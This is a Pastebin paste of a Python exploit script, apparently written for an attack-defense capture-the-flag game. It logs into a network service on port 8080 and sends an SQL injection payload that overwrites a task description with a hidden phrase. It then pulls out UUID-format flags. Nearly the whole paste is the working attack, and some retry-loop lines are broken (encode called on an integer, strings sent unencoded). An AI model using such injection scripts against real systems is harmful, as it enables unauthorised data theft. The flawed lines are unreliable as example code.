Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import re
- timeout = 5
- except_list = []
- FLAG_FORMAT = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
- def attack(ip, storage):
- limit = 1024
- name = 'k'
- sock = socket.socket()
- sock.connect((ip, 8080))
- sock.recv(limit)
- sock.send(name.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- sock.send(name.encode())
- sock.send('\n'.encode())
- str = sock.recv(limit).decode()
- if str.find('Incorrect') != -1:
- while str.find('Incorrect') != -1:
- name = name + 'k'
- sock.close()
- sock = socket.socket()
- sock.connect((ip, 8080))
- sock.recv(limit.encode())
- sock.send(name)
- sock.send('\n'.encode())
- sock.recv(limit.encode())
- sock.send(name)
- sock.send('\n'.encode())
- str = sock.recv(limit).decode()
- print('correct')
- if str.find('role?') != -1:
- sock.send('r'.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- print('get')
- sock.send('1'.encode())
- sock.send('\n'.encode())
- str = sock.recv(limit).decode()
- last_task = str.split(' ')[-1]
- sock.recv(limit)
- sock.close()
- sock = socket.socket()
- sock.connect((ip, 8080))
- sock.recv(limit)
- str = "'; UPDATE tasks SET(description) = (SELECT phrase FROM tasks WHERE id = " + last_task + ") WHERE id = " + last_task + "; -- "
- sock.send(str.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- sock.send(name.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- sock.close()
- sock = socket.socket()
- sock.connect((ip, 8080))
- sock.recv(limit)
- sock.send(name.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- sock.send(name.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- sock.send('1'.encode())
- sock.send('\n'.encode())
- sock.recv(limit)
- sock.send(last_task.encode())
- sock.send('\n'.encode())
- return (re.findall(FLAG_FORMAT, sock.recv(limit).decode()), storage)
- print(attack('10.218.15.2', 'null')[0])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement